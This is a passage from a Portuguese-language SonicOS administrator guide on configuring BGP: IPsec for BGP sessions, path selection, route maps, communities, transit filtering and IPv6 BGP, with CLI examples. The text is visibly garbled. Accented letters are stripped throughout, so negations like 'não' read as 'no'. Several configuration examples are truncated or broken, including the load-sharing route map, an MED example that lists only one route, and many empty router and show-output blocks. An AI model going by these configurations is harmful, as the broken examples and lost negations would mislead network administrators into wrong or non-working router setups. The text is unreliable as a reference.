SonicOS ou Zebos (o recurso "caminhos mximos"). Isto impossibilita o balanceamento de
carga sem dividir redes.
Loopback no existe atualmente nenhum suporte de interface de loopback.
NAT o BGP destina-se a roteamento. No coexiste satisfatoriamente com NAT.
Atualizaes de VPN as atualizaes de BGP por meio de VPN no esto funcionando
atualmente.
Caminhos assimtricos o firewall estvel no tratar atualmente caminhos
assimtricos, especialmente em vrios firewalls.

Configurar o BGP
As sees a seguir descrevem como configurar o roteamento avanado do BGP do SonicOS:
Configurao IPSec do BGP na pgina 1383
Configurao bsica de BGP na pgina 1385
Processo de seleo de caminho do BGP na pgina 1386
Precedncia de AS_PATH na pgina 1388
Multiple Exit Discriminator (MED) na pgina 1389
Comunidades de BGP na pgina 1390
Sincronizao e resumo automtico na pgina 1391
Impedir um AS de trnsito acidental na pgina 1392
Usar BGP de hospedagem mltipla para compartilhamento de carga na pgina 1393
Configurao IPSec do BGP

O BGP transmite pacotes sem codificao. Portanto, para uma segurana forte, a Dell
SonicWALL recomenda configurar um tnel IPSec para usar em sesses de BGP. As
configuraes do tnel IPSec e de BGP so independentes entre si. O tnel IPSec totalmente
configurado na seo de configurao de VPN da GUI do SonicOS e o BGP habilitado na
pgina Rede > Roteamento e depois configurado na interface de linha de comando do
SonicOS. Ao configurar o BGP em IPSec, configure primeiro o tnel IPSec e verifique a
conectividade no tnel antes de configurar o BGP.
O procedimento a seguir mostra um exemplo de configurao IPSec entre a SonicWALL e um
par de BGP remoto, em que a SonicWALL est configurada para 192.168.168.75/24 na rede
X0 e o par remoto est configurado para 192.168.168.35/24 na rede X0.
1. Navegue at a pgina VPN > Configuraes e clique no boto Adicionar na seo
Polticas de VPN. A janela Polticas de VPN ser exibida.
| 1383
2. No menu suspenso Tipo de poltica, certifique-se de que a opo Site a site seja
selecionada.
Nota Um tnel VPN site a site deve ser usado para BGP atravs de IPSec. As interfaces de tnel
no funcionaro para BGP.
3. Selecione o Mtodo de autenticao desejado. Neste exemplo, estamos usando IKE

usando segredo previamente compartilhado.
4. Insira um Nome para a poltica de VPN.
5. No campo Nome ou endereo de gateway primrio IPsec, digite o endereo IP do par
remoto (neste exemplo: 192.168.168.35).
6. No campo Nome ou endereo de gateway secundrio IPsec, digite 0.0.0.0.
7. Insira um Segredo compartilhado e confirme-o.
8. No campo ID de IKE local, digite o endereo IP do SonicWALL (neste exemplo:
192.168.168.75)
9. No campo ID de IKE par, digite o endereo IP do par remoto (192.168.168.35).
10. Clique na guia Rede.
11. Para a rede local, selecione X0 IP no menu suspenso Escolher rede local na lista.
12. Para a rede remota, selecione o endereo IP do par remoto no menu suspenso Escolher
rede de destino na lista que , neste exemplo, 192.168.168.35. Se o endereo IP remoto
no estiver listado, selecione Criar novo objeto de endereo para criar um objeto de
endereo para o endereo IP.
13. Clique na guia Propostas. Voc pode usar as propostas IPSec padro ou personaliz-las
como achar adequado.
14. Clique na guia Avanado.
15. Marque a caixa de seleo Habilitar keep alive.
16. Clique em OK.

A poltica de VPN est agora configurada no firewall. Conclua agora a configurao de IPSec
correspondente no par remoto. Quando estiver concluda, retorne pgina VPN >
Configuraes e marque a caixa de seleo Habilitar para a poltica de VPN iniciar o tnel
IPSec.
Use o diagnstico de ping no SonicWALL para fazer ping ao endereo IP do par de BGP e usar
o Wireshark para garantir que a solicitao e a resposta esto sendo encapsuladas em pacotes
ESP.
Nota Como configurado neste exemplo, o trfego roteado no percorrer o tnel IPSEC usado
para o BGP. O trfego enviado e recebido sem codificao, o que provavelmente ser o
comportamento desejado, pois o objetivo proteger o BGP e no todo o trfego de rede
roteado.
Para obter informaes detalhadas sobre a configurao de IPSec, consulte os captulos VPN
no Guia do administrador do SonicOS.
Configurao bsica de BGP

Para configurar o BGP em um dispositivo de segurana SonicWALL, execute as seguintes
tarefas:
1. Na GUI do SonicOS, navegue at a pgina Rede > Roteamento.
2. No menu suspenso Modo de roteamento, selecione Roteamento avanado.
3. No menu suspenso BGP, selecione Habilitado (Configurar com CLI).
Nota Aps o BGP ter sido habilitado atravs da GUI, as especificidades da configurao do BGP
so executadas usando a interface de linha de comando (CLI) do SonicOS. Para obter
informaes detalhadas sobre como realizar a conexo CLI do SonicOS, consulte o Guia
da interface de linha de comando do SonicOS em: http://www.sonicwall.com/us/support/
230_3623.html
4. Efetue o login na CLI do SonicOS atravs da interface do console.

5. Entre no modo de configurao digitando o comando configure.
6. Entre na CLI do BGP digitando o comando route ars-bgp. Voc ver o seguinte prompt:
ZebOS version 7.7.0 IPIRouter 7/2009
| 1385
ARS BGP>
7. Agora voc est no modo de no configurao do BGP. Digite ? para ver uma lista de
comandos de no configurao.
8. Digite show running-config para ver a configurao atual em execuo do BGP.
9. Para entrar no modo de configurao do BGP, digite o comando configure terminal. Digite
? para ver uma lista de comandos de configurao.
10. Quando voc tiver concludo a sua configurao, digite o comando write file. Se a unidade
fizer parte de um par ou cluster de alta disponibilidade, as alteraes de configurao
sero automaticamente transmitidas para a outra unidade ou unidades.
Processo de seleo de caminho do BGP

Os seguintes atributos podem ser usados para configurar o processo de seleo de caminho
do BGP.
Atributo Descrio
Peso Preferir rotas aprendidas de vizinhos com o peso mais alto definido.
Apenas relevante para o roteador local.
Preferncia de local Administrativamente, preferir rotas aprendidas de um vizinho.
Compartilhadas com todo o AS.
Caminhos de Rede ou Agregado Preferir caminhos que tiveram origem localmente a partir dos
comandos network e aggregate-address.
AS_PATH Preferir o caminho com o AS_PATH mais curto.
Origem Preferir o caminho com o tipo de origem mais baixo (como anunciado
em mensagens ATUALIZAR): IGP < EGP < Incompleto.
Multi Exit Discriminator (MED) Fornece informaes de preferncia de caminho a vizinhos para
caminhos com origem no AS.
Novidade Prefere o caminho recebido mais recentemente.
ID do roteador Prefere o caminho do roteador com a ID do roteador menor.
Peso
O comando de peso atribui um valor de peso, por famlia de endereos, a todas as rotas
aprendidas de um vizinho. A rota com o peso mais alto obtm preferncia quando o mesmo
prefixo aprendido a partir de mais de um par. O peso relevante apenas para o roteador
local.
Os pesos atribudos usando o comando set weight substituem os pesos atribudos com este
comando.
Quando o peso est definido para um grupo de pares, todos os membros deste grupo tero o
mesmo peso. O comando tambm pode ser usado para atribuir um peso diferente a um
membro de um grupo de pares especfico.
O exemplo a seguir mostra a configurao de peso:
router bgp 12345
neighbor 12.34.5.237 remote-as 12345
neighbor 12.34.5.237 weight 60

router bgp 12345
neighbor group1 peer-group
neighbor 12.34.5.237 peer-group group1
neighbor 67.78.9.237 peer-group group1
neighbor group1 weight 60
Preferncia de local
O atributo de preferncia de local usado para indicar o grau de preferncia de cada rota
externa na tabela de roteamento de um dispositivo. O atributo de preferncia de local est
includo em todas as mensagens de atualizao enviadas para dispositivos no mesmo AS. A
preferncia de local no comunicada para fora do AS. A figura seguinte mostra um exemplo
de topologia ilustrando como a preferncia do local afeta as rotas entre os ASs vizinhos.
Figura 29 Topologia de preferncia de local do BGP
As seguintes configuraes de BGP so inseridas em SNWL1 e SNWL2. A preferncia de local

maior em SNWL2 faz com que SNWL2 seja a rota preferida anunciada pelo AS 12345 (o AS
do SonicWALL) para fora de ASs.
Configurao de SNWL1 Configurao de SNWL2

x0 = 12.34.5.228 x0 = 12.34.5.237
x1 = 172.16.228.45 x1 = 10.1.1.2
------------------ ------------------
router bgp 12345 router bgp 12345
neighbor 172.16.228.228 remote-as 7675 neighbor 10.1.1.1 remote-as 8888
bgp default local-preference 150 bgp default local-preference 200
Preferncia de local usada com mapas de rotas
Os mapas de rotas so semelhantes a listas de controle de acesso. Eles consistem em uma

srie de declaraes de permisso e/ou negao que determinam como o dispositivo processa
as rotas. Os mapas de rotas so aplicados a trfego de entrada e no a trfego de sada. O
diagrama a seguir mostra um exemplo de topologia que usa um mapa de rotas para configurar
a preferncia de local.
| 1387
Figura 30 Topologia de preferncia de local do BGP com mapas de rotas
As seguintes configuraes de BGP so inseridas em SNWL1 e SNWL2.
Configurao de SNWL1 Configurao de SNWL2

x1 = 172.16.228.45 x0 = 12.34.5.237
x1 = 10.1.1.2
x4 = 10.4.4.1
------------------ ------------------
neighbor 12.34.5.237 remote-as 12345 neighbor 10.1.1.1 route-map rmap1 in
bgp default local-preference 150 neighbor 12.34.5.237 remote-as 12345
....
ip as-path access-list 100 permit ^8888$
...
route-map rmap1 permit 10
match as-path 100
set local-preference 200
route-map rmap1 permit 20

O mapa de rotas configurado em SNWL2 (rmap1) est configurado para ser aplicado a rotas
de entrada do vizinho 10.1.1.1. Ele possui duas condies de permisso:
route-map rmap1 permit 10: Esta condio de permisso corresponde lista de acesso
100 que est configurada para permitir trfego do AS 8888 e definir rotas do AS 8888 para
uma preferncia de local de 200.
route-map rmap1 permit 10: Esta condio de permisso define o restante trfego que
no corresponde lista de acesso 100 (ou seja, o trfego proveniente do ASs que no
8888) para uma preferncia de local de 150.
Precedncia de AS_PATH
A precedncia de AS_Path a prtica de adicionar mais nmeros ao AS no incio da
atualizao de um caminho. Isso torna o caminho desta rota maior e, portanto, diminui a sua
preferncia.

A precedncia de AS_Path pode ser aplicada a caminhos de entrada ou de sada. A
precedncia de AS_Path poder no ser considerada se for rejeitada por um vizinho.
Configurao do caminho de sada Configurao do caminho de entrada

bgp router-id 10.50.165.233 bgp router-id 10.50.165.228
network 12.34.5.0/24 network 7.6.7.0/24
neighbor 10.50.165.228 route-map long out neighbor 10.50.165.233 route-map prepend in
! !
route-map long permit 10 route-map prepend permit 10
set as-path prepend 12345 12345 set as-path prepend 12345 12345
Esta configurao faz com que uma rota seja instalada no vizinho 10.50.165.233 com a
precedncia de AS_Path como 12345 12345. Esta pode ser visualizada digitando o comando
show ip bgp.
ARS BGP>show ip bgp
BGP table version is 98, local router ID is 10.50.165.228
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
l - labeled
S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path

*> 12.34.5.0/24 10.50.165.233 0 0 12345 12345 12345 i
*> 7.6.7.0/24 0.0.0.0 100 32768 i
Total number of prefixes 2
Multiple Exit Discriminator (MED)

O comando set metric pode ser usado em um mapa de rotas para tornar os caminhos mais ou
menos preferveis:
router bgp 7675
network 7.6.7.0/24
neighbor 10.50.165.233 route-map highmetric out
!
route-map highmetric permit 10
set metric 300
O Multi Exit Discriminator (MED) um atributo opcional que pode ser usado para influenciar a
preferncia do caminho. Ele no transitivo, o que significa que est configurado em um nico
dispositivo e no anunciado a vizinhos em mensagens de atualizao. Nesta seo iremos
considerar as utilizaes dos comandos bgp always-compare-med ou bgp deterministic-
med.
| 1389
Comando bgp always-compare-med
O comando bgp always-compare-med permite a comparao dos valores de MED de
caminhos de diferentes ASs para seleo do caminho. Um caminho com um MED inferior
preferido.
Por exemplo, considere as seguintes rotas na tabela do BGP e que o comando always-
compare-med est habilitado:
Route1: as-path 7675, med 300
Route2 seria o caminho selecionado porque tem o MED mais baixo.

Se o comando always-compare-med for desabilitado, o MED no ser considerado ao
comparar a Route1 e a Route2, pois possuem diferentes caminhos de AS. O MED seria
comparado apenas para Route1 e Route3.
Comando bgp deterministic-med

A rota selecionada tambm afetada pelo comando bgp deterministic-med, o qual compara
o MED ao escolher entre rotas anunciadas por pares diferentes no mesmo sistema autnomo.
Quando o comando bgp deterministic-med est habilitado, as rotas do mesmo AS so
agrupadas e as melhores rotas de cada grupo so comparadas. Se a tabela do BGP mostrar:
Route1: as-path 200, med 300, internal
Route2: as-path 400, med 200, internal
Route3: as-path 400, med 250, external
O BGP teria um grupo de Route1 e um segundo grupo de Route2 e Route3 (o mesmo AS).
A melhor de cada grupo comparada. Route1 a melhor do seu grupo, pois a nica rota do
AS 200.
Route1 comparada Route2, a melhor do grupo AS 400 (o MED inferior).
Uma vez que as duas rotas no so do mesmo AS, o MED no considerado na comparao.
A rota do BGP externo a preferida comparativamente rota do BGP interno, fazendo com
que a Route3 seja a melhor rota.
Comunidades de BGP
Uma comunidade um grupo de prefixos que compartilham algumas propriedades comuns e
podem ser configurados com um atributo de comunidade de BGP transitivo. Um prefixo pode
ter mais de um atributo de comunidade. Os roteadores podem atuar em um, alguns ou todos
os atributos. As comunidades de BGP podem ser consideradas uma forma de marcao. Veja
a seguir um exemplo de uma configurao de comunidades de BGP.
router bgp 12345
bgp router-id 10.50.165.233
network 12.34.5.0/24
network 23.45.6.0/24
neighbor 10.50.165.228 send-community
neighbor 10.50.165.228 route-map comm out

!
access-list 105 permit 12.34.5.0/24
!
route-map comm permit 10
match ip address 105
set community 7675:300
!
route-map comm permit 20
match ip address 110
set community 7675:500
!
router bgp 7675
network 7.6.7.0/24
neighbor 10.50.165.233 route-map shape in
!
ip community-list 1 permit 7675:300
ip community-list 2 permit 7675:500
!
route-map shape permit 10
match community 1
set local preference 120
route-map shape permit 20

match community 2
set local preference 130
Sincronizao e resumo automtico

A configurao de sincronizao controla se o roteador anuncia ou no rotas aprendidas de
um vizinho iBGP com base na presena dessas rotas no respectivo IGP. Quando a
sincronizao est habilitada, o BGP somente anuncia rotas que esto acessveis atravs de
OSPF ou RIP (os protocolos de gateway exterior, em oposio ao BGP, o protocolo de gateway
exterior). A sincronizao uma causa comum de problemas no anncio de rotas de BGP.
A configurao de resumo automtico controla se as rotas so ou no anunciadas com
classes. O resumo automtico outra causa comum de problemas na configurao de BGP.
Por padro, o resumo automtico e a sincronizao esto desabilitados no Zebos.
| 1391
Impedir um AS de trnsito acidental
Tal como foi discutido anteriormente, um par de AS pode ser um par de trnsito (permitindo
trfego de um AS externo para outro AS externo) ou um par de no trnsito (requerendo que
todo o trfego tenha origem ou termine no respectivo AS). Os pares de trnsito tero tabelas
de roteamento substancialmente maiores. Geralmente, voc no precisa configurar um
dispositivo de segurana SonicWALL como um par de trnsito.
Figura 31 Pares de trnsito vs. pares de no trnsito
Para impedir que seu dispositivo se torne um par de trnsito de forma inadvertida, voc
precisar configurar filtros de entrada e de sada, como apresentado a seguir:
Filtros de sada
Permitir apenas rotas com origem no AS local externo:

ip as-path access-list 1 permit ^$
router bgp 12345

network 12.34.5.0/24
neighbor 10.50.165.228 filter-list 1 out
neighbor 10.50.165.228 filter list 1 out
Permitir somente a sada de prefixos de propriedade:

ip prefix-list myPrefixes seq 5 permit 12.34.5.0/24
ip prefix-list myPrefixes seq 10 permit 23.45.6.0/24
router bgp 12345

network 12.34.5.0/24
network 23.45.6.0/24
neighbor 10.50.165.228 prefix-list myPrefixes out
neighbor 172.1.1.2 prefix-list myPrefixes out
Filtros de entrada
Descartar todos os prefixos de entrada de propriedade e privados

ip prefix-list unwantedPrefixes seq 5 deny 12.34.5.0/24 le 32
ip prefix-list unwantedPrefixes seq 30 permit 0.0.0.0/0 le 32
router bgp 12345

network 12.34.5.0/24
network 23.45.6.0/24
neighbor 10.50.165.228 prefix-list unwantedPrefixes in
neighbor 172.1.1.2 prefix-list unwantedPrefixes in
Usar BGP de hospedagem mltipla para compartilhamento de carga

A topologia a seguir mostra um exemplo de um dispositivo de segurana SonicWALL que usa
uma rede BGP de hospedagem mltipla para compartilhamento de carga entre dois ISPs.
Figura 32 Topologia de BGP de hospedagem mltipla para compartilhamento de carga
O aplicativo de segurana SonicWALL est configurado da seguinte forma:
| 1393
router bgp 12345
network 12.34.5.0/24
neighbor 10.50.165.228 route-map ISP1 out
neighbor 10.50.165.228 route-map ISP2 out
!
route-map ISP1 permit 10
match ip address 1
set weight 100

match ip address 2

match ip address 1

match ip address 2
set weight 100

access-list 2 deny 12.34.5.0/25
access-list 2 permit any
Verificar a configurao do BGP

As sees a seguir descrevem mtodos de verificao de uma configurao de BGP:
Visualizar rotas de BGP na pgina 1394
Configurar o registro do BGP na pgina 1396
Visualizar rotas de BGP

A figura abaixo mostra uma topologia bsica de BGP de um dispositivo de segurana
SonicWALL que est configurado para o BGP se conectar a dois roteadores em dois ASs
diferentes.

Figura 33 Topologia de BGP
As rotas na FIB desta rede podem ser visualizadas na GUI do SonicOS ou usando a CLI.
Visualizar rotas da FIB na GUI
Pode ser visualizado um resumo da configurao do BGP na GUI do SonicOS atravs da

pgina Rede > Roteamento clicando no boto Status de BGP localizado na parte superior da
pgina junto ao menu suspenso do modo de roteamento. A janela Status de BGP exibe a sada
dos comandos show ip bgp summary ou show ip bgp neighbor.
As rotas do BGP na FIB tambm podem ser visualizadas na GUI do SonicOS na tabela
Polticas de roteamento na pgina Rede > Roteamento.
Visualizar rotas da FIB na CLI
Para visualizar as rotas da FIB na CLI, execute os seguintes comandos:

SonicWALL> configure
(config[SonicWALL])> route ars-nsm
ZebOS version 7.7.0 IPIRouter 7/2009

ARS NSM>show ip route
Cdigos: K - kernel, C - connected, S - static, R - RIP, B - BGP
O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
| 1395
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default
B 7.6.7.0/24 [20/0] via 10.50.165.228, X1, 05:08:31

B 199.199.0/16 [20/0] via 10.50.165.237, X1, 05:08:31
C 10.50.165.192/26 is directly connected, X1
C 127.0.0.0/8 is directly connected, lo0
C 12.34.5.0/24 is directly connected, X0
Visualizar rotas da RIB na CLI
Para visualizar as rotas da RIB na CLI, digite o comando IP show ip bgp:

ARS BGP>show ip bgp
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
l - labeled
S Stale
Network Next Hop Metric LocPrf Weight Path

*> 7.6.7.0/24 10.50.165.228 0 0 7675 i
*> 12.34.5.0/24 0.0.0.0 100 32768 i
*> 199.199.0.0/16 10.50.165.228 0 0 7675 9999 i
Nota A ltima rota o caminho para o AS9999 que foi aprendido atravs do AS7675.
Configurar o registro do BGP

O BGP SonicWALL oferece uma seleo abrangente de comandos de depurao para exibir
eventos de registro relacionados com o trfego do BGP. O registro do BGP pode ser
configurado na CLI usando o comando debug bgp, seguido das seguintes palavras-chave:
Palavras-chave de
depurao do BGP Descrio
tudo Habilita toda a depurao do BGP.
atenuao Habilita a depurao para atenuao do BGP.
eventos Habilita a depurao para eventos do BGP.
filtros Habilita a depurao para filtros do BGP.
fsm Habilita a depurao para a mquina de estado finito (FSM) do BGP.
keepalives Habilita a depurao para keepalives do BGP.
nht Habilita a depurao para mensagens NHT.

Palavras-chave de
depurao do BGP Descrio
nsm Habilita a depurao para mensagens NSM.
atualizaes Habilita a depurao para atualizaes do BGP de entrada/sada.
Para desabilitar a depurao do BGP, digite a forma "no" (no) do comando. Por exemplo, para
desabilitar a depurao do evento, digite o comando no debug events.
As mensagens de registro do BGP tambm podem ser visualizadas na GUI do SonicOS na
pgina Log > Visualizar. As mensagens do BGP so exibidas como parte da categoria
Roteamento avanado de mensagens de registro.
A mensagem acima indica que foi negada uma atualizao na RIB de sada porque o roteador
a partir do qual foi recebida a atualizao no estava diretamente conectado ao dispositivo.
Para permitir pares do BGP que no estiverem diretamente conectados, use a palavra-chave
ebgp-multihop com o comando neighbor. Por exemplo:
neighbor 10.50.165.228 ebgp-multihop
BGP IPv6
O BGP (Border Gateway Protocol) IPv6 comunica informaes de roteamento IPv6 entre
sistemas autnomos (ASs). Um dispositivo de segurana Dell SonicWall com suporte IPv6
BGP pode substituir um roteador BGP tradicional no limite do AS de uma rede.
O BGP IPv6 ativado na pgina Rede > Roteamento, mas deve ser configurado na Interface
de Linha de Comando (CLI) SonicOS.
As seguintes restries aplicam-se ao SonicOS 6.2:
BGP IPv6 suportado somente nas plataformas NSA.
O BGP IPv6 depende das funes IPv6 e ZebOS (Zebra OS).
O MPLS/VPN e a difuso seletiva no so suportados no BGP IPv6.
Configurar vrios sistemas autnomos

Se um sistema autnomo (AS) no tiver vrios roteadores BGP, o AS pode servir como um
servio de trnsito para outros ASs. Quando o BGP funcionar entre roteadores em ASs
diferentes, este usa BGP exterior (eBGP). Quando o BGP funcionar entre roteadores no
mesmo AS, este usa BGP interior (iBGP).
| 1397
No diagrama seguinte, o AS 200 um AS de trnsito para o AS 100 e AS 300.
Para configurar vrios ASs como mostrado no diagrama acima, configure os roteadores RTA,
RTB e RTC da seguinte forma:
No RTA:
router bgp 100
neighbor 129.213.1.1 remoteas 200
address-family ipv6
redistribute connected
neighbor 129.213.1.1 activate
No RTB:
router bgp 200
address-family ipv6
No RTC:
router bgp 200
address-family ipv6

Configurar o BGP bsico por IPv6
Um roteador de par BGP IPv6 pode ser configurado para transmitir informaes da rota IPv4
ou IPv6 por uma famlia de endereos IPv6 ou uma famlia de endereos IPv4.
Para configurar o BGP por IPv6, configure os roteadores R1 e R2 da seguinte forma:
No R1:
router bgp 6501
bgp routerid 1.1.1.1
neighbor 2011:11:11:11::2 remoteas 6502
addressfamily ipv6
neighbor 2011:11:11:11::2 activate
exitaddressfamily
No R2:
router bgp 6502
addressfamily ipv6
network 1010::1/128
network 2020::1/128
Configurar o EBGP Multihop

O EBGP Multihop permite estabelecer uma conexo vizinha entre dois pares externos que no
esto diretamente conectados. O multihop est disponvel somente para o eBGP e no est
disponvel para o iBGP. Quando o firewall tiver um vizinho externo que no tem uma conexo
direta, possvel usar o comando ebgpmultihop para estabelecer uma conexo vizinha.
Para configurar o EBGP Multihop, configure os roteadores R1 e R2 da seguinte forma:
No R1:
router bgp 6501
neighbor 2011:11:11:11::2 ebgpmultihop
addressfamily ipv6
exitaddressfamily
| 1399
No R2:
router bgp 6502
neighbor 2011:11:11:11::1 ebgpmultihop
addressfamily ipv6
network 1010::1/128
network 2020::1/128
Configurar o ORF do BGP IPv6

O ORF (Outbound Route Filter) do BGP IPv6 pode ser usado para minimizar o nmero de
atualizaes do BGP enviadas entre os roteadores dos pares filtrando atualizaes de
roteamento no desejadas na fonte.
Para configurar o ORF do BGP IPv6, configure os roteadores R1 e R2 da seguinte forma:
No R1:
router bgp 6501
addressfamily ipv6
neighbor 2011:11:11:11::2 prefix-list pref1 in
neighbor 2011:11:11:11::2 prefix-list pref2 out
exitaddressfamily
ipv6 prefix-list pref1 seq 10 deny 1010::1/128

ipv6 prefix-list pref1 seq 20 permit any
ipv6 prefix-list pref2 seq 10 deny 1111::1/128
ipv6 prefix-list pref2 seq 20 permit any
No R2:
router bgp 6502
addressfamily ipv6
Para verificar as rotas no R1 e R2, use o comando show bgp ipv6 unicast.
A rota no R1 deve ter o endereo IPv6 1010::1/128.
No R1:
R1> show bgp ipv6 unicast
No R2:

Configurar a lista de distribuio do BGP IPv6
A lista de distribuio do BGP IPv6 pode ser usada para minimizar o nmero de atualizaes
do BGP enviadas entre os roteadores dos pares filtrando atualizaes de roteamento no
desejadas na fonte.
Para configurar a lista de distribuio do BGP IPv6, configure os roteadores R1 e R2 da
seguinte forma:
No R1:
router bgp 6501
addressfamily ipv6
neighbor 2011:11:11:11::2 distribute-list acl1 in
neighbor 2011:11:11:11::2 distribute-list acl2 out
exitaddressfamily
ipv6 access-list acl1 deny 1010::1/128

ipv6 access-list acl1 permit any
No R2:
router bgp 6502
addressfamily ipv6
No R1:
No R2:
Mapa de rotas BGP IPv6

O mapa de rotas do BGP IPv6 pode ser usado para minimizar o nmero de atualizaes do
BGP enviadas entre os roteadores dos pares filtrando atualizaes de roteamento no
desejadas na fonte.
Para configurar o mapa de rotas do BGP IPv6, configure os roteadores R1 e R2 da seguinte
forma:
| 1401
No R1:
router bgp 6501
addressfamily ipv6
neighbor 2011:11:11:11::2 route-map map1 in
neighbor 2011:11:11:11::2 route-map map2 out
exitaddressfamily

!
route-map map1 permit 1 match ipv6 address acl1
!
route-map map2 permit 1 match ipv6 address acl2
!
No R2:
router bgp 6502
addressfamily ipv6
No R1:
No R2:

Configurar uma expresso comum do AS
possvel configurar expresses comuns que podem ser combinadas e usadas para negar ou
permitir endereos a partir do AS.
O RTB anuncia estas rotas:

2004::/64
2003::/64
2002::/64
O RTC anuncia estas rotas:
5000::/64
6666::6/128
7777::7/128
Para verificar as rotas no roteador RTA, use o comando show bgp ipv6 unicast.
No RTA:
RTA> show bgp ipv6 unicast

Status codes: s suppressed, d damped, h history, * valid, > best,
i - internal, l - labeled
S Stale
Rede Next hop Mtrica LocPrf Peso Caminho
*> 2002::/64 ::ffff:a00:101 0 0 100 i
*> 2003::/64 ::ffff:a00:101 0 0 100 i
*> 2004::/64 ::ffff:a00:101 0 0 100 i
*> 5000::/64 ::ffff:a00:101 0 0 100 400i
*> 6666::6/128 ::ffff:a00:101 0 0 100 400
*> 7777::7/128 ::ffff:a00:101 0 0 100 400
Para configurar as expresses comuns do AS no RTA e negar todas as rotas no AS100:

router bgp 200
| 1403
neighbor 10.0.1.1 update-source X2
neighbor 2004::1 remote-as 100
neighbor 2004::1 update-source X2
!
address-family ipv6
neighbor 10.0.1.1 filter-list 1 in
neighbor 2004::1 activate
exit-address-family
ip as-path access-list 1 deny ^100$

ip as-path access-list 1 permit .*
No RTA:

Status codes: s suppressed, d damped, h history, * valid, > best,
i - internal, l - labeled
S Stale
Rede Next hop Mtrica LocPrf Peso Caminho
*> 5000::/64 ::ffff:a00:101 0 0 100 400i
*> 6666::6/128 ::ffff:a00:101 0 0 100 400i
*> 7777::7/128 ::ffff:a00:101 0 0 100 400i
Para modificar o caminho do AS para negar todas as rotas aprendidas de AS100:
No RTA:
router bgp 200
neighbor 10.0.1.1 update-source X2
!
address-family ipv6
neighbor 10.0.1.1 filter-list 1 in
exit-address-family
ip as-path access-list 1 deny _100_

ip as-path access-list 1 permit .*
No RTA:

Seleo de rotas do EBGP
As rotas so selecionadas com base na distncia administrativa do protocolo de roteamento
em execuo nessa rota. Os protocolos de roteamento com distncias administrativas
inferiores tm prioridade sobre os protocolos de roteamento com distncias administrativas
superiores. O EBGP tem uma distncia administrativa de 20. O OSPF tem uma distncia
administrativa de 110.
Este diagrama mostra trs ASs e os protocolos de roteamento usados por roteadores BGP.
O roteador RTC no AS300 anuncia a rota 1000::/64 para o AS100 e o AS200.

A rota do RTC (AS300) para RTA (AS100) executa o OSPF.
A rota do RTC (AS300) para RTB (AS200) executa o eBGP.
A rota do RTA (AS100) para RTB (AS200) executa o eBGP.
O RTA (AS100) recebe atualizaes sobre a rota 1000::/64 do OSPF e do eBGP. A rota
aprendida do eBGP selecionada e adicionada tabela de roteamento do RTA, porque a
distncia administrativa do eBGP menor que a distncia administrativa do OSPF.
No RTA:
router bgp 100
!
address-family ipv6
distance bgp 150 150 150
exit-address-family
No RTB:
router bgp 200
bgp log-neighbor-changes
address-family ipv6
network 6666::6/128
exit-address-family
| 1405
No RTC:
router bgp 300
!
address-family ipv6 network 1000::/64
exit-address-family
Para verificar as rotas no roteador RTA, use o comando show ipv6 route.
RTA> show ipv6 route
IPv6 Routing Table
Cdigos: K - kernel route, C - connected, S - static, R - RIP, O - OSPF, I - IS-

IS, B - BGP
Timers: Tempo de operao
B 1000::/64 [20/0] via fe80::204:27ff:fe0c:b006, X1, 00:01:07

C 2003::/64 via ::, X1, 00:30:50
B 6666::6/128 [20/0] via fe80::204:27ff:fe0c:b006, X1, 00:01:07
C fe80::/64 via ::, X1, 00:30:53
Uma vez que o RTC est diretamente conectado ao RTA, a rota do OSPF realmente uma
melhor rota que a rota aprendida pelo BGP. Para garantir que a rota entre RTA e RTC
selecionada para a tabela de roteamento, possvel usar o comando distance para alterar a
distncia administrativa padro da rota BGP para uma distncia administrativa maior que a rota
OSPF. Por exemplo:
distance bgp 150 150 150
Tambm possvel usar o comando backdoor neighbor para definir a rota BGP como a rota
preferida. Por exemplo:
No RTA:
router bgp 100
!
address-family ipv6
network 1000::/64
backdoor neighbor 3001::1 activate
exit-address-family
Para verificar as rotas no roteador RTA, use o comando show ipv6 route.
RTA> show ipv6 route
IPv6 Routing Table
Cdigos: K - kernel route, C - connected, S - static, R - RIP, O - OSPF, I - IS-

IS, B - BGP
Timers: Tempo de operao
O 1000::/64 [110/2] via fe80::217:c5ff:feb4:57f2, X4, 00:30:53

C 2003::/64 via ::, X1, 00:31:18
B 6666::6/128 [20/0] via fe80::204:27ff:fe0c:b006, X1, 00:00:03
C fe80::/64 via ::, X1, 00:31:21

Sincronizao do BGP IPv6
A sincronizao do BGP IPv6 mantm todos os roteadores BGP atualizados com os endereos
IPv6 de todas as rotas e redes disponveis.
Na sincronizao do BGP, se um AS (AS100) passar trfego de outro AS (AS300) para um
terceiro AS (AS400), o BGP no anuncia essa rota at que todos os roteadores no AS100
tenham aprendido essa rota do IGP. Neste caso, o IGP iBGP. O AS100 deve aguardar at
que o iBGP propague essa rota para todos os roteadores no AS100. Ento, o eBGP anuncia a
rota ao ASs externo.
Neste exemplo, aps o RTB aprender o endereo 6666::6/128 via iBGP, este anuncia o
endereo ao RTD.
Nota Poder fazer com que o RTB pense que o IGP j propagou as informaes da rota
adicionando uma rota esttica ao 6666::6/128 no RTB e certificando-se de que outros
roteadores possam atingir 6666::6/128.
Neste exemplo, o RTC (AS2) anuncia o endereo 6666::6/128 ao RTA (AS100). No AS100, o
RTA e RTB esto executando o iBGP, pelo que o RTB aprende o endereo 6666::6/128 e
capaz de alcan-lo por meio do prximo salto 5.5.5.5 (RTC). O prximo salto transmitido via
iBGP. Porm, para alcanar o prximo salto (RTC), o RTB deve enviar trfego por meio do
RTE, mas o RTE no conhece o endereo IP 6666::6/128.
Se o RTB anunciar o 6666::6/128 ao RTD (AS400), o trfego que tenta alcanar 6666::6/128
do RTD deve passar por meio do RTB e RTE no AS100. Porm, uma vez que o RTE no
aprendeu o 6666::6/128, todos os pacotes sero descartados no RTE.
Para configurar a sincronizao do BGP no RTB do AS100:
No RTB:
router bgp 100
| 1407
!
address-family ipv6
synchronization
exit-address-family
possvel desabilitar a sincronizao se no passar trfego de um AS para outro AS por meio

de um AS intermedirio. Tambm possvel desabilitar a sincronizao se todos os roteadores
